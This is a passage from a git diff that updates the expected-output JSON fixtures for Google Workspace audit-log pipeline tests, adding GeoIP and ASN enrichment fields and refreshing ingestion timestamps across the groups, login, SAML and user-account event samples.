"as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286141400Z", + "ingested": "2021-12-14T14:45:12.889100471Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reject_join_request", @@ -1782,24 +2055,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1834,8 +2098,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286168800Z", + "ingested": "2021-12-14T14:45:12.889100988Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reinvite_user", @@ -1863,24 +2148,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1915,8 +2191,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286173Z", + "ingested": "2021-12-14T14:45:12.889101378Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "remove_user", @@ -1944,6 +2241,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json index 1260efd85eb..5878a394ea4 100644 --- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json +++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json @@ -33,6 +33,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -42,7 +54,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340887200Z", + "ingested": "2021-12-14T14:45:17.586936822Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_password_leak", @@ -102,6 +114,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -111,7 +135,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340892600Z", + "ingested": "2021-12-14T14:45:17.586939612Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -171,6 +195,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -180,7 +216,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340898900Z", + "ingested": "2021-12-14T14:45:17.586940081Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -240,6 +276,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -249,7 +297,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340903900Z", + "ingested": "2021-12-14T14:45:17.586940494Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -308,6 +356,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -317,7 +377,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340907800Z", + "ingested": "2021-12-14T14:45:17.586940904Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_generic", @@ -376,6 +436,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -385,7 +457,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340912700Z", + "ingested": "2021-12-14T14:45:17.586941285Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming_through_relay", @@ -444,6 +516,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -453,7 +537,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340919200Z", + "ingested": "2021-12-14T14:45:17.586941669Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming", @@ -513,6 +597,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -522,7 +618,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340925400Z", + "ingested": "2021-12-14T14:45:17.586942056Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -578,6 +674,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -587,7 +695,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340931600Z", + "ingested": "2021-12-14T14:45:17.586942447Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", "provider": "login", "action": "gov_attack_warning", @@ -642,6 +750,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -651,7 +771,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340937700Z", + "ingested": "2021-12-14T14:45:17.586942851Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_failure", @@ -708,6 +828,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -717,7 +849,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340943800Z", + "ingested": "2021-12-14T14:45:17.586943240Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_challenge", @@ -773,6 +905,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -782,7 +926,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340950400Z", + "ingested": "2021-12-14T14:45:17.586943818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_verification", @@ -836,6 +980,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -845,7 +1001,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340956600Z", + "ingested": "2021-12-14T14:45:17.586944236Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "logout", @@ -900,6 +1056,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -909,7 +1077,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340962800Z", + "ingested": "2021-12-14T14:45:17.586944647Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_success", diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json index ded2713b385..3c6f4be9ccb 100644 --- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json +++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json @@ -37,6 +37,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -46,7 +58,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.166836800Z", + "ingested": "2021-12-14T14:45:19.798450068Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_failure", @@ -104,6 +116,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -113,7 +137,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.166844900Z", + "ingested": "2021-12-14T14:45:19.798452567Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_success", diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json index abfbeea015e..a8a3181249c 100644 --- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json +++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json @@ -29,6 +29,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -38,7 +50,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537558Z", + "ingested": "2021-12-14T14:45:20.193639239Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}", "provider": "user_accounts", "action": "2sv_disable", @@ -89,6 +101,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -98,7 +122,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537562500Z", + "ingested": "2021-12-14T14:45:20.193641518Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}", "provider": "user_accounts", "action": "2sv_enroll", @@ -149,6 +173,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -158,7 +194,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537568300Z", + "ingested": "2021-12-14T14:45:20.193641978Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}", "provider": "user_accounts", "action": "password_edit", @@ -209,6 +245,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -218,7 +266,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537572800Z", + "ingested": "2021-12-14T14:45:20.193642381Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}", "provider": "user_accounts", "action": "recovery_email_edit", @@ -269,6 +317,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -278,7 +338,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537577900Z", + "ingested": "2021-12-14T14:45:20.193642787Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}", "provider": "user_accounts", "action": "recovery_phone_edit", @@ -329,6 +389,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -338,7 +410,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537583700Z", + "ingested": "2021-12-14T14:45:20.193643198Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}", "provider": "user_accounts", "action": "recovery_secret_qa_edit", @@ -389,6 +461,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -398,7 +482,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537589400Z", + "ingested": "2021-12-14T14:45:20.193643589Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}", "provider": "user_accounts", "action": "titanium_enroll", @@ -449,6 +533,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -458,7 +554,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537595200Z", + "ingested": "2021-12-14T14:45:20.193643974Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}", "provider": "user_accounts", "action": "titanium_unenroll", diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml index 6491dcaab1b..53d74668da9 100644 --- a/packages/google_workspace/manifest.yml +++ b/packages/google_workspace/manifest.yml @@ -1,6 +1,6 @@ name: google_workspace title: Google Workspace Audit Reports -version: 